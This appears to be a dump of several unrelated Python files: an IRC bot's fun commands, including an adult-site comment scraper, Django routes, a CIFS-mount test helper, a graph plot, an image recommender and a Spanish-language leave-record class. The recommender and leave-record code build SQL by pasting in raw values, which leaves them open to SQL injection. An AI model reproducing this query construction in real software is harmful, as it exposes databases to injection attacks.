\n LOGGER.info(\"\\tTrades booked: %d, %d\", trade.Oid(), trade2.Oid())\n\n # acm.CommitTransaction()\n except Exception as exc:\n # acm.AbortTransaction()\n LOGGER.exception(\"Instrument '%s' not created: %s\", name, exc)\n raise\n \n return ins\n\n\n# print create_deposit(\"MAP110\", \"GBP\", \"CALL_ACCOUNT\", \"2017-06-06\").Name()\n","sub_path":"Python modules/PB_Saxo_deposit.py","file_name":"PB_Saxo_deposit.py","file_ext":"py","file_size_in_byte":7317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"403183672","text":"'''\nchannelmodule for #pony.ql\n'''\nimport willie\nfrom random import choice\nimport datetime\nimport requests\nimport re\nimport urllib.request as urllib2\n'''import urllib2'''\nimport random\n\n@willie.module.commands('quakecon')\ndef quakecon(bot, trigger):\n now = datetime.datetime.now() \n qcon = datetime.datetime(2016, 8, 4, 10)\n delta = qcon - now\n if delta.days < 6:\n hours, remainder = divmod(delta.seconds, 3600)\n minutes, seconds = divmod(remainder, 60) \n output = \"{days} days, {hours} hours, {minutes} minutes, and {seconds} seconds until QuakeCon!\".format(days=delta.days, hours=hours, minutes=minutes, seconds=seconds)\n else:\n output = \"%s days until QuakeCon!\" % delta.days\n bot.say(output)\n\n@willie.module.commands('blizzcon')\ndef blizzcon(bot, trigger):\n now = datetime.datetime.now()\n target = datetime.datetime(2015, 11, 6, 0)\n delta = target - now\n if delta.days < 7:\n hours, remainder = divmod(delta.seconds, 3600)\n minutes, seconds = divmod(remainder, 60)\n output = \"{days} days, {hours} hours, {minutes} minutes, and {seconds} seconds until BlizzCon!\".format(days=delta.days, hours=hours, minutes=minutes, seconds=seconds)\n else:\n output = \"%s days until BlizzCon!\" % delta.days\n bot.say(output)\n\n@willie.module.commands('zen')\ndef zen(bot, trigger):\n bot.say(requests.get(\"https://api.github.com/zen\").text)\n \n@willie.module.commands('whatgameisthayacurrentlyplaying')\ndef whatgameisthayacurrentlyplaying(bot, trigger):\n bot.say(\"not playing, just botting.\")\n\n@willie.module.commands('nfact')\ndef nfact(bot, trigger):\n bot.say(requests.get(\"http://numbersapi.com/random\").text)\n\n@willie.module.commands('42')\ndef fourtytwo(bot, trigger):\n bot.say(requests.get(\"http://numbersapi.com/42\").text)\n\n@willie.module.commands('tfact')\ndef today(bot, trigger):\n month = datetime.datetime.now().month\n day = datetime.datetime.now().day\n bot.say(requests.get(\"http://numbersapi.com/%s/%s/date\" % (month, day)).text)\n\n@willie.module.commands('askreddit', 'asscredit')\ndef ask(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/askreddit.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('shower')\ndef shower(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/showerthoughts.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('5050')\ndef fifty(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/fiftyfifty.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s - %s\" % (pick[\"title\"], pick[\"url\"]))\n\n@willie.module.commands('til')\ndef til(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/todayilearned.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"title\"]))\n\n@willie.module.commands('beat')\ndef beat(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/beatheads.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n \n@willie.module.commands('kadse', 'kazachstan', 'c@')\ndef kadse(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/catgifs.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n\n@willie.module.commands('newbeat','latest')\ndef newbeat(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/beatheads/new.json?limit=1\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s\" % (pick[\"url\"]))\n\n@willie.module.commands('tifu')\ndef tifu(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n pick = choice(requests.get(\"http://www.reddit.com/r/tifu.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"]\n bot.say(\"%s - %s\" % (pick[\"title\"], pick[\"url\"]))\n\n@willie.module.commands('rather')\ndef rather(bot, trigger):\n header = {\"User-Agent\": \"Willie the bot\"}\n bot.say(choice(requests.get(\"http://www.reddit.com/r/wouldyourather.json?limit=100\", headers=header).json()[\"data\"][\"children\"])[\"data\"][\"title\"])\n\n@willie.module.commands('youporn', 'yp')\ndef youporn(bot, trigger):\n foundComment = False\n opener = urllib2.build_opener()\n opener.addheaders.append(('Cookie', 'age_verified=1'))\n\n for x in range(7):\n f = opener.open(\"http://www.youporn.com/random/video/\")\n htmlSource = f.read()\n f.close()\n comments = re.findall(b'
    ((?:.|\\\\n)*?)

    ', htmlSource)\n if len(comments) == 0:\n continue\n randomcomment = random.choice(comments).replace(b\"

    \", b\"\")\n bot.say(randomcomment, max_messages=2)\n foundComment = True\n break\n if not foundComment:\n bot.say(\"No comment found, please retry\")\n\n@willie.module.commands('jpg','jpeg')\ndef jpg(bot, trigger):\n bot.say(\"Do I look like I know what a JPEG is? https://youtu.be/QEzhxP-pdos\")\n\n@willie.module.commands('fap','fapathon')\ndef fap(bot, trigger):\n bot.say(\"https://i.imgur.com/9ciSNye.gifv\")\n\n@willie.module.commands('rd')\ndef reverseDict(bot, trigger):\n word = trigger.group(2)\n if not word:\n bot.say(\"syntx: .rd \")\n else:\n result = requests.get(\"http://api.datamuse.com/words\", params={\"rd\": word}).json()\n if result:\n reply = \"Possible words matching '%s': %s\" % (word, \", \".join(w[\"word\"] for w in result[0:5]))\n bot.say(reply)\n \n@willie.module.commands(\"lenny\")\ndef lenny(bot, trigger):\n bot.say(u\"( ͡° ͜ʖ ͡°)\")\n \n@willie.module.commands(\"wowalert\")\ndef wowalert(bot, trigger):\n bot.say(\"http://launcher.worldofwarcraft.com/alert (US); http://status.wow-europe.com/en/alert (EU)\")\n","sub_path":"heh.py","file_name":"heh.py","file_ext":"py","file_size_in_byte":6017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"349179382","text":"\nfrom django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\n# from django.contrib import admin\n# admin.autodiscover()\nfrom django.views.generic.base import TemplateView\nfrom robintechsite.core import views\n\nurlpatterns = patterns('',\n url(r'^$', TemplateView.as_view(template_name ='home.html'), name='core-home'),\n url(r'^about', TemplateView.as_view(template_name ='about.html'), name='core-about'),\n url(r'^experience', views.ExperienceView.as_view(), name='core-experience'),\n url(r'^contact$', views.ContactView.as_view(), name='core-contact'),\n url(r'^sitemap', views.SitemapView.as_view(), name='core-sitemap'),\n\n)\n","sub_path":"robintechsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"340592247","text":"#!/usr/bin/python\n# Filename : input-float.py\n\ndef main():\n\t# membuat prompt untuk tipe data float\n\tbilangan_riil = float(input(\"masukkan bilangan rill :\"))\n\n\t# menggunakan variabel untuk perhitungan\n\thasil = bilangan_riil * 2\n\n\t# menampilkan nilai variabel\n\tprint(\"Bilangan yang dimasukkan adalah %.2f\" % bilangan_riil)\n\tprint(\"%.2f * 2 = %.2f\" % (bilangan_riil,hasil))\n\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"input-float.py","file_name":"input-float.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"461223671","text":"# -*- coding: utf-8 -*-\r\nimport os\r\nimport platform\r\nfrom random import choice\r\nfrom string import ascii_letters\r\nfrom subprocess import Popen, PIPE\r\nfrom logging import *\r\nbasicConfig(format=u'[LINE:%(lineno)d] # %(levelname)-8s [%(asctime)s] %(message)s', level=DEBUG)\r\n\r\n\r\ndef execute(proc, print_output=True):\r\n p = Popen(proc, shell=True, stdout=PIPE, stderr=PIPE)\r\n out = p.stdout.read().decode('utf-8')\r\n err = p.stderr.read().decode('utf-8')\r\n out += err\r\n if print_output: debug(out)\r\n p.wait(timeout=20)\r\n return out, p.returncode\r\n\r\n\r\ndef is_64bit():\r\n return platform.machine().endswith('64')\r\n\r\n\r\ndef mount_share():\r\n if \"192.168.71.111/requests/\" in execute(\"mount -l\")[0]:\r\n debug('kca already mounted')\r\n else:\r\n if not os.path.exists(\"/mnt/kca\"):\r\n os.mkdir(\"/mnt/kca/\")\r\n execute(\"mount -t cifs //192.168.71.111/requests/Fazlyev/autotest/msca/ /mnt/kca/ \\\r\n -o user=user,password=password,rw,file_mode=0777,dir_mode=0777\")\r\n assert \"192.168.71.111/requests/\" in execute(\"mount -l\")[0]\r\n\r\n\r\ndef random_folder_in_kca(action, folder=None):\r\n if action == \"create\":\r\n folder = (''.join(choice(ascii_letters) for i in range(15)))\r\n if os.path.exists(\"/mnt/kca/requests/{0}\".format(folder)): os.rmdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n os.mkdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n return folder\r\n elif action == \"remove\":\r\n os.rmdir(\"/mnt/kca/requests/{0}\".format(folder))\r\n\r\n\r\ndef set_rng(rng=\"unixdev\"):\r\n out, returncode = execute(\"/opt/itcs/bin/rngcmgr default --rng {0}\".format(rng))\r\n assert returncode == 0\r\n assert \"Successed\" in out\r\n","sub_path":"windows_helper/os_system.py","file_name":"os_system.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"379006892","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Sep 05 09:35:30 2019\r\n\r\n@author: makoto_\r\n\"\"\"\r\n\r\nimport os\r\nimport matplotlib.pyplot as plt\r\nimport networkx as nx\r\nimport numpy as np\r\n\r\npath = os.path.dirname(os.path.abspath(__file__))\r\n\r\ndef main():\r\n (n) = np.loadtxt(path+'/n.dat').astype(int)\r\n\r\n Adj = np.loadtxt(path+'/Graph_adjMat.dat')\r\n G = nx.from_numpy_matrix(Adj, create_using=nx.MultiDiGraph())\r\n # pos = nx.spring_layout(G, iterations=200)\r\n pos = nx.circular_layout(G)\r\n\r\n plt.figure()\r\n labels = {}\r\n for i in range(n):\r\n labels[i] = r\"{0}\".format(i+1)\r\n\r\n nx.draw(G, pos, font_size=15, labels=labels, node_color=\"lightblue\", edgecolors=\"#6fbbd3\", node_size=450)\r\n # nx.draw_networkx_nodes(G, pos, node_size=20, alpha=1.0, node_color=\"lightblue\")\r\n # nx.draw_networkx_edges(G, pos, width=2)\r\n # nx.draw_networkx_labels(G, pos, labels, font_size=8)\r\n\r\n plt.savefig(path+\"/figs/graph_n20_labeled.png\")\r\n plt.savefig(path+\"/figs/graph_n20_labeled.pdf\")\r\n plt.show(block=False)\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"labelToAge-Graph.py","file_name":"labelToAge-Graph.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"394865050","text":"import sqlite3\nfrom collections import Counter \n\n#GETS THE N TOP RECCOMENDATIONS (BY K NEAREST NEIGHBORS AND COSINE SIMILARITY METRIC)\n#IF NO FAVOURITES FOUND FOR USER, RETURNS FALSE\ndef getNRecommendations(user_id, source, n):\n db = sqlite3.connect(\"scrapedlinks.sqlite\")\n cursor = db.cursor()\n\n #Fetch information from the user's favourited images and tags\n sql = \"\"\n if (source == \"gelbooru\"):\n sql = f\"SELECT tags,link FROM sauceusers WHERE user_id={user_id}\"\n else:\n sql = sql = f\"SELECT tags,link FROM sauce34users WHERE user_id={user_id}\"\n cursor.execute(sql)\n res = cursor.fetchall()\n if (len(res) == 0):\n return False\n\n #Keep track of the most commonly occurring tags in the user's favourite images\n tagStr = \"\"\n #keep record of the user's favourited images\n userLinkList = []\n\n #Iterate through all the user's favourite images and their respective tags\n for tags, link in res: \n tagStr += tags\n tagStr += \" \"\n userLinkList.append(link)\n tagList = tagStr.split()\n #Fetch the three most commonly occurring tags (used for preliminary filtering)\n word1 = Counter(tagList).most_common(3)[0][0]\n word2 = Counter(tagList).most_common(3)[1][0]\n word3 = Counter(tagList).most_common(3)[2][0]\n\n #Create a user profile vector with the number of occurences of each tag in all of the user's favourite images\n userTagCount = dict(Counter(tagList))\n\n #Fetch all of the images containing any of the user's 3 most commonly occurring tags\n if (source == \"gelbooru\"):\n sql = f\"SELECT * from sauce WHERE tags LIKE '%{word1}%' OR tags LIKE '%{word2}%' OR tags LIKE '%{word3}%'\"\n else:\n sql = f\"SELECT * from sauce34 WHERE tags LIKE '%{word1}%' OR tags LIKE '%{word2}%' OR tags LIKE '%{word3}%'\"\n cursor.execute(sql)\n res = cursor.fetchall()\n\n #Holds evaluation metrics\n linkScores = []\n linkMap = []\n\n for elem in res:\n link = elem[0]\n #Check if image is already in user's favourites\n if link in userLinkList:\n continue\n tags = elem[1]\n #We generate a tag count vector for all the tags of each image\n linkTagCount = dict(Counter(tags.split()))\n\n #Each image will have a tag vector looking that looks like {\"tag1\": 1, \"tag2\": 1, \"tag3\": 1, ....}\n #The user profile vector will also look like {\"tag1\": (some number), \"tag2\": (some number) ...}\n\n #This algorithm will treat each tag as an axis in cartesian space, and we will treat both dictionaries as vectors.\n #We will use the cosine value of the angle between the vectors as a similarity metric\n dot_product = sum(userTagCount[tag] * linkTagCount.get(tag, 0) for tag in userTagCount)\n \n userTagMag = pow(sum(userTagCount[tag] * userTagCount[tag] for tag in userTagCount), 0.5)\n linkTagMag = pow(sum(linkTagCount[tag] * linkTagCount[tag] for tag in linkTagCount), 0.5)\n\n #manually compute cosine sim\n cosine_sim = dot_product/(userTagMag * linkTagMag)\n #Maps links to a cosine similarity score for reverse lookup\n linkMap.append([link, cosine_sim])\n #We will only append the cosine sim scores so we have a single dimension list that can be quickly sorted\n linkScores.append(cosine_sim)\n linkScores.sort(reverse=True)\n \n links = []\n if(n >= len(linkScores)):\n n = len(linkScores) - 1\n \n for score in linkScores[0:n]:\n for pair in linkMap:\n if (pair[1] == score):\n links.append(pair[0])\n cursor.close()\n db.commit()\n db.close()\n return list(dict.fromkeys(links))[0:n]\n\n","sub_path":"cogs/imagereccomend.py","file_name":"imagereccomend.py","file_ext":"py","file_size_in_byte":3684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"270908688","text":"import random\n\nprint(\"Welcome to die\")\n\ndef diceRoll():\n die1 = random.randint(1,6)\n die2 = random.randint(1,6)\n sum = die1 + die2\n print(\"Die 1: %d, Die 2: %d, You move: %d spaces\" % (die1, die2, sum))\n if die1 == die2:\n print(\"Doubles\")\n diceRoll()\n else:\n print(\"Next Player's Turn\")\n\ndiceRoll()\n","sub_path":"python/labs/rock-paper-scissors/random-numbers.py","file_name":"random-numbers.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"607047855","text":"# coding=utf-8\nimport sys\n\nfrom conexion import Conexion\nfrom datetime import date, datetime\n\nclass Licencia(object):\n\t\n\t_cambios = True\n\t_nuevo = True\n\t_id = int()\n\t_id_empleado = int()\n\t_desde = str()\n\t_hasta = str()\n\t_dias_tomados = int()\n\t_tipo = str()\n\t_comentario = str()\n\t\n\tdef __init__(self, id_bbdd=0):\n\t\t\n\t\tif id_bbdd < 1:\n\t\t\treturn\n\t\t\n\t\tconsulta = \"SELECT id, id_empleado, desde, hasta, dias_tomados, tipo, comentario\\\n\t\t\t\t\tFROM licencia WHERE id = \" + str(id_bbdd)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\treturn\n\t\t\n\t\tself._id = resultset[0]\n\t\tself.id_empleado = resultset[1]\n\t\tself.desde = resultset[2]\n\t\tself.hasta = resultset[3]\n\t\tself.dias_tomados = resultset[4]\n\t\tself.tipo = resultset[5]\n\t\tself.comentario = resultset[6]\n\t\tself._cambios = False\n\t\tself._nuevo = False\n\t\n\t\"\"\"Inicio: Metodos estaticos\"\"\"\n\t\n\t@staticmethod\n\tdef licencia(id_empleado, desde, ):\n\t\t\n\t\tl = Licencia()\n\t\t\n\t\tconsulta = \"SELECT id, id_empleado, desde, hasta, dias_tomados, tipo, comentario\\\n\t\t\t\t\tFROM licencia WHERE id_empleado = \" + str(id_empleado) + \" AND desde = cast('\" + str(desde) + \"' as date)\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\treturn\n\t\t\n\t\tl._id = resultset[0]\n\t\tl.id_empleado = resultset[1]\n\t\tl.desde = resultset[2]\n\t\tl.hasta = resultset[3]\n\t\tl.dias_tomados = resultset[4]\n\t\tl.tipo = resultset[5]\n\t\tl.comentario = resultset[6]\n\t\tl._cambios = False\n\t\tl._nuevo = False\n\t\t\n\t\treturn l\n\t\n\t@staticmethod\n\tdef de_empleado(id_empleado, tipo=\"\"):\n\t\t\n\t\tif id_empleado < 1:\n\t\t\treturn\n\t\t\n\t\tif tipo != \"\":\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE tipo = '\" + str(tipo) + \"' AND id_empleado = \" + str(id_empleado) + \" ORDER BY desde DESC\"\n\t\telse:\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE id_empleado = \" + str(id_empleado) + \" ORDER BY desde DESC\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchall()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tls = []\n\t\t\n\t\tfor datos in resultset:\n\t\t\t\n\t\t\tl = Licencia(datos[0])\n\t\t\t\n\t\t\tls.append(l)\n\t\t\t\n\t\treturn ls\n\t\n\t@staticmethod\n\tdef licencias():\n\t\t\n\t\tls = []\n\t\t\n\t\tconsulta = \"SELECT id FROM licencia\"\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchall()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tfor datos in resultset:\n\t\t\t\n\t\t\tl = Licencia(datos[0])\n\t\t\t\n\t\t\tls.append(l)\n\t\t\n\t\treturn ls\n\t\n\t\"\"\"Fin: Metodos estaticos\"\"\"\n\t\n\tdef guardar(self, ):\n\t\t\n\t\tif not self._cambios:\n\t\t\treturn\n\t\t\n\t\tif self.id_empleado == 0:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tif self.desde == \"\":\n\t\t\traise Exception(\"La fecha desde no es válida.\")\n\t\t\n\t\tif self.hasta == \"\":\n\t\t\traise Exception(\"La fecha hasta no es válida.\")\n\t\t\n\t\tif self.dias_tomados < 1:\n\t\t\traise Exception(\"Las fechas no son válidas.\")\n\t\t\n\t\tif self.tipo == \"\":\n\t\t\traise Exception(\"El tipo de licencia no es válido.\")\n\t\t\n\t\tif self._id_empleado == 0:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tdic = {\"a1\" : \"id_empleado\", \n\t\t\t\t\"a2\" : \"desde\", \n\t\t\t\t\"a3\" : \"hasta\", \n\t\t\t\t\"a4\" : \"dias_tomados\", \n\t\t\t\t\"a5\" : \"tipo\", \n\t\t\t\t\"a6\" : \"comentario\", \n\t\t\t\t}\n\t\t\n\t\tvals = {\"v1\" : self.id_empleado, \n\t\t\t\t\"v2\" : self.desde, \n\t\t\t\t\"v3\" : self.hasta, \n\t\t\t\t\"v4\" : self.dias_tomados, \n\t\t\t\t\"v5\" : self.tipo, \n\t\t\t\t\"v6\" : self.comentario, \n\t\t\t\t}\n\t\t\n\t\t#VALIDO QUE EXISTA EL EMPLEADO\n\t\tconsulta = \"SELECT id FROM empleado WHERE id = \" + str(self.id_empleado)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is None:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\t#VALIDO QUE NO EXISTA UNA LICENCIA EN EL MISMO PERIODO DE TIEMPO\n\t\tconsulta = \"SELECT id FROM licencia \" +\\\n\t\t\t\t\t\"WHERE (desde <= cast('\" + str(self.desde) + \"' as date) AND hasta >= cast('\" + str(self.desde) + \"' as date) \" + \\\n\t\t\t\t\t\"OR desde <= cast('\" + str(self.hasta) + \"' as date) AND hasta >= cast('\" + str(self.hasta) + \"' as date) \" +\\\n\t\t\t\t\t\"OR desde >= cast('\" + str(self.desde) + \"' as date) AND hasta <= cast('\" + str(self.hasta) + \"' as date)) \" +\\\n\t\t\t\t\t\"AND id != \" + str(self.id) +\\\n\t\t\t\t\t\" AND id_empleado = \" + str(self.id_empleado)\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tresultset = Conexion.fetchone()\n\t\t\n\t\tConexion.cerrar()\n\t\t\n\t\tif resultset is not None:\n\t\t\traise Exception(\"El empleado ya se está tomando una licencia en esta fecha.\")\n\t\t\n\t\tif self.tipo == \"58\":\n\t\t\t\n\t\t\tif self.dias_tomados > 1:\n\t\t\t\traise Exception(\"La cantidad de días no es válida para una licencia de tipo 58.\")\n\t\t\t\n\t\t\tls = Licencia.de_empleado(self.id_empleado, \"58\")\n\t\t\t\n\t\t\tcant_por_anio = 0\n\t\t\tfor l in ls:\n\t\t\t\tanio = l.desde.split('/')[2]\n\t\t\t\tif anio == self.desde.split('/')[2] and l.id != self.id:\n\t\t\t\t\tcant_por_anio = cant_por_anio + 1\n\t\t\t\n\t\t\tif cant_por_anio >= 6:\n\t\t\t\traise Exception(\"El empleado ya se tomó 6 artículos 58 este año.\")\n\t\t\t\n\t\t\tcant_por_mes = 0\n\t\t\tfor l in ls:\n\t\t\t\tmes = l.desde.split('/')[1]\n\t\t\t\tif mes == self.desde.split('/')[1] and l.id != self.id:\n\t\t\t\t\tcant_por_mes = cant_por_mes + 1\n\t\t\t\n\t\t\tif cant_por_mes >= 2:\n\t\t\t\traise Exception(\"El empleado ya se tomó 2 artículos 58 este mes.\")\n\t\t\n\t\tif self._nuevo:\n\t\t\t\n\t\t\tconsulta = \"INSERT INTO licencia('a1', 'a2', 'a3', 'a4', 'a5', 'a6')\\\n\t\t\t\t\t\tVALUES('v1', 'v2', 'v3', 'v4', 'v5', 'v6') RETURNING id\"\n\t\t\t\n\t\t\tfor i in range(1, 7):\n\t\t\t\t\n\t\t\t\tif vals[\"v\" + str(i)]:\n\t\t\t\t\t\n\t\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"'\", str(dic[\"a\" + str(i)]))\n\t\t\t\t\t\n\t\t\t\t\tif isinstance(vals[\"v\" + str(i)], int):\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", str(vals[\"v\" + str(i)]))\n\t\t\t\t\telse:\n\t\t\t\t\t\tif '/' in str(vals[\"v\" + str(i)]):\n\t\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"cast('\" + str(vals[\"v\" + str(i)]) + \"' as date)\")\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"'\" + str(vals[\"v\" + str(i)]) + \"'\")\n\t\t\t\telse:\n\t\t\t\t\tif \"'v\" + str(i) + \"', \" in consulta:\n\t\t\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"', \", \"\")\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"', \", \"\")\n\t\t\t\t\telif \", \" + \"'v\" + str(i) + \"')\" in consulta:\n\t\t\t\t\t\tconsulta = consulta.replace(\", \" + \"'a\" + str(i) + \"'\", \"\")\n\t\t\t\t\t\tconsulta = consulta.replace(\", \" + \"'v\" + str(i) + \"'\", \"\")\n\t\t\t\n\t\telse:\n\t\t\t\n\t\t\tconsulta = \"SELECT id FROM licencia WHERE desde = cast('\" + str(self.desde) + \"' as date) AND id_empleado = \" + str(self.id_empleado)\n\t\t\t\n\t\t\tConexion.ejecutar(consulta)\n\t\t\t\n\t\t\tresultset = Conexion.fetchone()\n\t\t\t\n\t\t\tConexion.cerrar()\n\t\t\t\n\t\t\tif resultset is not None:\n\t\t\t\tfor id_bbdd in resultset:\n\t\t\t\t\tif id_bbdd != self.id:\n\t\t\t\t\t\traise Exception(\"Ya existe esta licencia para este empleado.\")\n\t\t\t\n\t\t\tconsulta = \"UPDATE licencia SET 'a1' = 'v1',\\\n\t\t\t\t\t\t\t\t\t\t\t'a2' = 'v2',\\\n\t\t\t\t\t\t\t\t\t\t\t'a3' = 'v3',\\\n\t\t\t\t\t\t\t\t\t\t\t'a4' = 'v4',\\\n\t\t\t\t\t\t\t\t\t\t\t'a5' = 'v5',\\\n\t\t\t\t\t\t\t\t\t\t\t'a6' = 'v6'\\\n\t\t\t\t\t\t\t\t\t\t\tWHERE id = \" + str(self.id)\n\t\t\t\n\t\t\tfor i in range(1, 7):\n\t\t\t\t\n\t\t\t\tconsulta = consulta.replace(\"'a\" + str(i) + \"'\", str(dic[\"a\" + str(i)]))\n\t\t\t\t\n\t\t\t\tif isinstance(vals[\"v\" + str(i)], int) or isinstance(vals[\"v\" + str(i)], float):\n\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", str(vals[\"v\" + str(i)]))\n\t\t\t\telse:\n\t\t\t\t\tif '/' in str(vals[\"v\" + str(i)]):\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"cast('\" + str(vals[\"v\" + str(i)]) + \"' as date)\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tconsulta = consulta.replace(\"'v\" + str(i) + \"'\", \"'\" + str(vals[\"v\" + str(i)]) + \"'\")\n\t\t\n\t\tConexion.ejecutar(consulta)\n\t\t\n\t\tif self._nuevo:\n\t\t\tself._id = Conexion.fetchone()[0]\n\t\t\tself._nuevo = False\n\t\t\tself._cambios = False\n\t\t\n\t\tConexion.cerrar()\n\t\n\tdef eliminar(self, ):\n\t\t\n\t\tif self._nuevo:\n\t\t\treturn\n\t\t\n\t\tif self.id == 0:\n\t\t\treturn\n\t\t\n\t\tconsulta = \"DELETE FROM licencia WHERE id = \" + str(self.id)\n\t\tConexion.ejecutar(consulta)\n\t\tConexion.cerrar()\n\t\t\n\t\tself._nuevo = True\n\t\tself._cambios = True\n\t\n\t\"\"\"Inicio: Getters y Setters\"\"\"\n\t\n\t@property\n\tdef id(self):\n\t\treturn self._id\n\t\n\t@property\n\tdef id_empleado(self):\n\t\treturn self._id_empleado\n\t\n\t@id_empleado.setter\n\tdef id_empleado(self, id_empleado):\n\t\t\n\t\ttry:\n\t\t\tid_empleado = int(id_empleado)\n\t\t\t\n\t\t\tif id_empleado < 1:\n\t\t\t\traise ValueError\n\t\t\t\n\t\texcept ValueError:\n\t\t\traise Exception(\"El empleado no es válido.\")\n\t\t\n\t\tif self._id_empleado != id_empleado:\n\t\t\tself._id_empleado = id_empleado\n\t\t\tself._cambios = True\n\t\n\t@property\n\tdef desde(self):\n\t\treturn self._desde\n\t\n\t@desde.setter\n\tdef desde(self, desde):\n\t\t\n\t\tdesde = str(desde)\n\t\t\n\t\tdia = \"\"\n\t\tmes = \"\"\n\t\tanio = \"\"\n\t\t\n\t\tif \"/\" in desde:\n\t\t\tdia, mes, anio = desde.split('/')\n\t\telif \"-\" in desde:\n\t\t\tanio, mes, dia = desde.split('-')\n\t\telse:\n\t\t\traise Exception(\"La fecha desde posee un formato no válido.\")\n\t\t\n\t\tdia = int(dia)\n\t\tmes = int(mes)\n\t\tanio = int(anio)\n\t\t\n\t\ttry:\n\t\t\tdatetime(anio, mes, dia)\n\t\texcept ValueError:\n\t\t\traise Exception(\"La fecha desde no es válida.\")\n\t\t\n\t\tdia = str(dia)\n\t\tmes = str(mes)\n\t\tanio = str(anio)\n\t\t\n\t\tif self._desde != dia + \"/\" + mes + \"/\" + anio:\n\t\t\tself._desde = dia + \"/\" + mes + \"/\" + anio\n\t\t\tself._cambios = True\n\t\t\n\t\tif self._hasta != \"\":\n\t\t\t\n\t\t\tddia, dmes, danio = str(self._desde).split('/')\n\t\t\thdia, hmes, hanio = str(self._hasta).split('/')\n\t\t\t\n\t\t\tcomp_desde = datetime(int(danio), int(dmes), int(ddia))\n\t\t\tcomp_hasta = datetime(int(hanio), int(hmes), int(hdia))\n\t\t\t\n\t\t\tif ((comp_hasta - comp_desde).days + 1) < 1:\n\t\t\t\tself._hasta = \"\"\n\t\t\t\treturn\n\t\t\t\n\t\t\tself.dias_tomados = (comp_hasta - comp_desde).days + 